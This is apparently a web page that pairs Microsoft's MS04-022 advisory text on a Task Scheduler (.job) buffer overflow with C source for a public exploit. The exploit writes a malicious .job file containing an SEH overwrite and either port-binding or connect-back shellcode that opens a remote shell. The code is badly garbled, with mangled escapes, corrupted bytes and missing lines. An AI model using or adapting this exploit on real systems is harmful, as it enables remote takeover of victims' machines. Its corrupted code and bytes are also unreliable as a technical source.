Microsoft Security Bulletin MS04-022 — Overflow Exploit Code
Vulnerability description: Task Scheduler Vulnerability - CAN-2004-0212
What is the scope of this vulnerability? This is a remote code execution vulnerability. If the user is logged on with administrative privileges, an attacker who successfully exploits this vulnerability could take complete control of the affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full privileges. Users whose accounts are configured with fewer privileges on the system are at less risk than users who operate with administrative privileges. However, exploiting this vulnerability requires user interaction.
What causes this vulnerability? An unchecked buffer in the Task Scheduler component.
What is the Task Scheduler? The Task Scheduler can be used to schedule a command, program, or script to run at a specific time. A task can be saved as a file with the .job extension, which makes it easier to move task information between systems. Administrators can create a scheduled maintenance task file and place it wherever it is needed. For more information, see the Task Scheduler Web site.
What could an attacker do with this vulnerability? An attacker who successfully exploits this vulnerability could take complete control of the affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full privileges.
How could an attacker exploit this vulnerability? An attacker could attack the system in several ways. Some examples:
• An attacker could host a malicious Web site designed to exploit this vulnerability through Internet Explorer, then entice the user to view that Web site. • An attacker could place a specially crafted .job file on the local file system or on a network share, then entice the user to view that folder with Windows Explorer. • An attacker could also reach the affected component through other means. For example, an attacker could log on to the system interactively, or use another program that passes parameters to the vulnerable component (locally or remotely).
Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)
/ * HOD-MS04022-TASK-EXPL.C: * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * Exploit Version 0.1 Coded By * * *. :: [HouseOfdabus] ::. * * * [AT Inbox Dot Ru] * ----------------------------------------- -------------------------- * TESTED ON: * - Internet Explorer 6.0 (sp1) (ipplore.exe) * - Explorer (Explorer.exe ) * - Windows XP SP0, SP1 * * ---------------------------------------- --------------------------- * Compile: * Win32 / VC : CL HOD-MS04022-Task-expl.c * Win32 / Cygwin: GCC HOD-MS04022-TASK-EXPL.C -LWS2_32.LIB * Linux: GCC -O HOD-MS04022-Task-Expl HOD-MS04022-Task-Expl.c * * ------------ -------------------------------------------------- ----- * Command line parameters / arguments: * * hod.exe
#include
/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x90 / x90 / x 90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 "" / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 / X61 / x00 / x00 "" / x61 / x00 / x00 / x00 / x00 / x61 / x00 "" / x1e / x82 / xdc / X77 "/ * 0x77DC821E - POP REG, POP REG, RET (Advapi32.dll) * // * for Win2k USE JMP EBX OR CALL EBX * /" / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 "" / x80 "/ * generate exceptation * /" / x61 / x00 / x61 / x00 / x61 / x00 / x61 / x00 " "/ x90 / x90"; / * portbind shellcode * / unsigned char portbindsc [] = "/ x90 / x90" / x90 / x90 / xeb / x06 "
/ * overwrite seh-frame * / "/ x90 / x90" "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" "/ Xeb / x70 / x56 / x33 / xc0 / x64 / x8b / X40 / X30 / x85 / XC0 / X78 / X0C / X8B / X40 / X0C "" / x8b / x70 / x1c / xad / x8b / x40 / x08 / Xeb / x09 / x8b / x40 / x34 / x8d / x40 / x7c / X8B "" / x40 / x3c / x5e / xc3 / x60 / x8b / x6c / x24 / x24 / x8b / x45 / x3c / x8b / x54 / x05 / x78 "" / x03 / xd5 / x8b / x4a / x18 / x8b / X5A / X20 / X03 / XDD / XE3 / X34 / X8B "" / X03 / XF5 / X33 / XFF / X33 / XC0 / XFC / XAC / X84 / XC0 / X74 / X07 / XC1 / XCF / X0D / X03 "/ XF8 / XEB / XDD / X5A / X24 / X03 / XDD / X66 / X8B" "/ X0C / X4B / X8B / X5A / X1C / X03 / XDD / X8B / X04 / X8B / X03 / XC5 / X89 / X44 / X24 / X1C "" / X61 / XC3 / XEB / X3D / XAD / X50 / X52 / XE8 / XA8 / XFF / XFF / XFF / X89 / X07 / x83 / xc4 "" / x08 / x83 / xc7 / x04 / x3b / x8e / x4e / x0e / xec / x72 / xfe / xb3 "" / x16 / x7e / xd8 / xe2 / X73 / XAD / XD9 / X05 / XCE / XD9 / X09 / XF5 / XAD / XA4 / X1A / X70 "" / XC7 / XA4 / XAD / X2E / XE9 / XE5 / X49 / X86 / X49 / XCB / XED / XFC / X3B / XE7 / X79 / XC6 "" / x79 / x83 / xec / x60 / x8b / x05 / x-x02 / x02 / xff / xff / xff / x5e "" / XE8 / X3D / XFF / XFF / XFF / X8B / XD0 / X83 / XEE / X04 / X8B / XCE / X83 "" / XC1 / X10 / XE8 / X9D / XFF / XFF / XFF / X83 / XC1 / X18 / X33 / XC0 / X66 / XB8 / X33 / X32 "" / x5 0 / X68 / X77 / X73 / X32 / X5F / X52 / X53 / XFF / X55 / X04 / X5A / X59 "" / X8B / XD0 / XE8 / X7D / XFF / XFF / XFF / XB8 / X01 / X63 / X6D / X64 / XC1 / XF8 / X08 / X50 "" / x89 / x65 / x34 / x33 / xc0 / x66 / xb8 / x90 / x01 / x2b / xe0 / x54 / x83 / xc0 / x72 / x50 " "/ XFF / X55 / X24 / X33 / XC0 / X50 / X50 / X50 / X40 / X50 / XFF / X55 / X14" "/ x8b / xf0 / x33 / xc0 / x33 / xdb / x50 / X50 / X50 / XB8 / X02 / X01 / X11 / X5C / XFE / XCC "" / X50 / x8b / xc4 / xb3 / x10 / x53 / x50 / x56 / x56 / x18 / x53 / x56 / xff / x55 / X1C "" / x53 / x8b / xd4 / x2b / x51 / x56 / xff / x55 / x20 / x8b / xf0 / x33 "" / xc9 / xb1 / x54 
/ x2b / xe1 / x8b / XFC / X57 / X33 / XC0 / XF3 / XAA / X5F / XC6 / X07 / X44 "" "
/ XFE / X47 / X2D / X57 / X7F / X38 / XAb / XAb / XAb / X5F / X33 / XC0 / X8D "" / x77 / x44 / x56 / x57 / x50 / x50 / x50 / x40 / X50 / X48 / X50 / X50 / XFF / X75 / X34 / X50 "" / XFF / X55 / X08 / XF7 / XD0 / X50 / XFF / X36 / XFF / X55 / X10 / XFF / X77 / X38 / XFF / X55 "/ x28 / xff / x55 / x0c"; / * connectback shellcode * / unsigned char connectionbacksc [] = "/ x90 / x90" "/ x90 / x90 / x06" / * overwrite seh-frame * / "/" / * overwrite seh-frame * / X90 / X90 "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" "/ XEB / X70 / X56 / X33 / XC0 / X64 / X8B / X40 / X30 / X85 / XC0 / X78 / X0C / X8B / X40 / X0C "" / x8b / x70 / x08 / x34 / x8d / x40 / x7c / x8b "" / x40 / x3c / x5e / XC3 / X60 / X8B / X6C / X24 / X24 / X8B / X54 / X05 / X78 "" / x03 / xd5 / x8b / x4a / x18 / x8b / x5a / x20 / x03 / xdd / xe3 / X34 / X49 / X8B / X34 / X8B "" / X03 / XF5 / X33 / XC / X33 / XC0 / X74 / X07 / XC1 / XCF / XEB / X03 "" "" "" "" "" "" "" "" "" "" XF4 / X3B / X7C / X24 / X28 / X75 / XE1 / X8B / X5A / X24 / X03 / XDD / X66 / X8B "" / X0C / X4B / X8B / X5A / X1C / X03 / XDD / X8B / X04 / X8B / X03 / XC5 / X89 / X44 / X24 / X1C "" / X61 / XC3 / XEB / X35 / XAD / X50 / X52 / XE8 / XA8 / X07 / X83 / XC4 "" "/ x08 / X83 / XC7 / X04 / X3B / XF1 / X75 / XEC / XC3 / X8E / X4E / X0E / XEC / X72 / XFE / XB3 "" / X16 / X7E / XD8 / XE2 / X73 / XAD / X D9 / X05 / XCE / XD9 / X09 / XF5 / XAD / XEC / XF9 / XAA "" / X60 / XCB / XED / XFC / X3B / XE7 / X79 / XC6 / X79 / X83 / XEC / X60 / X8B / XEC / XEB / X02 "" / XEB / X05 / XE8 / XD9 / XFF / XFF / XFF / XD0 / X83 "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "/ XEE / X2E / X8D / X7D / X04 / X8B / XCE / X83 / XC1 / X10 / XE8 / XA5 / XFF / XFF / XFF / X83 "" / XC1 / X10 / X33 / XC0 / X66 / XB8 / X33 / X32 / X50 / X68 / X77 / X73 / X32 / X5F / X8B / XDC "" / X51 / X52 / X53 / XFF / X55 / X04 / XD0 / XE8 / X85 / XFF / XFF / XFF / XB8 "" / X01 / X63 / X6D / X64 / XC1 / XF8 / X08 / X50 / X89 / XC0 / 
X66 / XB8 / X90 "" / X01 / X2B / XE0 / X72 / X50 / XFF / X55 / X1C / X33 / XC0 / X50 / X50 / X50 "" "
/ x50 / x40 / x50 / x40 / x50 / xff / x55 / x14 / x8b / xf0 / x68 / x7f / x01 / x01 / x01 / xb8 "" / x02 / x01 / x11 / x5c / xfe / xcc / x50 / x8b / XDC / X33 / XC0 / XB0 / X10 / X50 / X53 / X56 "" / XFF / X55 / X18 / X54 / X2B / XE1 / X8B / XFC / X57 / X33 / XC0 / XF3 / XAA "" / x5f / xc6 / x07 / x44 / xfe / x47 / x2d / x57 / x8b / xc6 / x8d / x7f / x38 / xab / xab / xab "" / x5f / x33 / xc0 / x8d / x77 / x44 / x56 / x57 / x50 / x50 / x50 / x40 / x50 "" / xff / x75 / x30 / x50 / xff / x55 / x08 / xf7 / xd0 / x50 / xff / x36 / xff / x55 / x10 / XFF "/ x77 / x38 / x55 / x0c"; / * use this formunsigned char sc [] = "/ x90 / x90" / x90 / x90 / xeb / x06 "- Overwrite SEH-FRAME "/ x90 / x90" "/ x90 / x90 / x90 / x90" "/ x90 / x90 / x90 / x90" ... code ... "; * / unsigned char endofjob [] =" / x00 / x00 / x00 / x00 "; #define set_portbind_port (buf, port) * ((BUF) 300 16)) = (port) #define set_connectback_ip (buf, ip) * (unsigned long * ((BUF) 283 16)) = (ip) #define set_connectback_port (buf, port) * ((BUF) 290 16)) = (port) Voidusage (char * prog ) {Printf ("USAGE: / N"); Printf ("% s
2) USAGE (Argv [0]); fp = fopen (Argv [1], "WB"); if (fp == null) {printf ("[-] error: can / 't create file:% s / N ", argv [1]); exit (0);} / * header & garbage * / fwrite (jobfile, 1, sizeof (jobfile) -1, fp); FSeek (FP, 39 * 16, seek_set); Port = ATOI (Argv [3]); Printf ("[*] shellcode:"); if (sc == 1) {set_portbind_port (portbindsc, htons (port)); Printf ("Portbind, port =% U / N ", port); fwrite (portbindsc, 1, sizeof (portbindsc) -1, fp); fwrite (endofjob, 1, 4, fp); FSeek (FP, 70, seek_set); / * Calculate length (see header) * * / strlen = (sizeof (jobfile) -1-71 sizeof (portbindsc) -1 4) / 2;} else {ip = inet_addr (argv [4]); SET_CONNECTBACK_IP (connectbacksc, ip); SET_CONNECTBACK_PORT (connectbacksc, htons (port); Printf ("Connectback, Port =% U, IP =% S / N", Port, Argv [4]); FWRITE (ConnectBacksc, 1, Sizeof (ConnectBacksc) -1, FP); FWRITE (Endofjob , 1, 4, fp); FSEEK (FP, 70, Seek_set); / * Calculate Length * / Strlen = (Sizeof (Jobfile) -1-71 Sizeof (ConnectBacksc) -1 4) / 2 }Printf ("[*] generat E File:% S / N ", Argv [1]); FWRITE (& Strlen, 1, 2, fp); fclose (fp); Return 0;}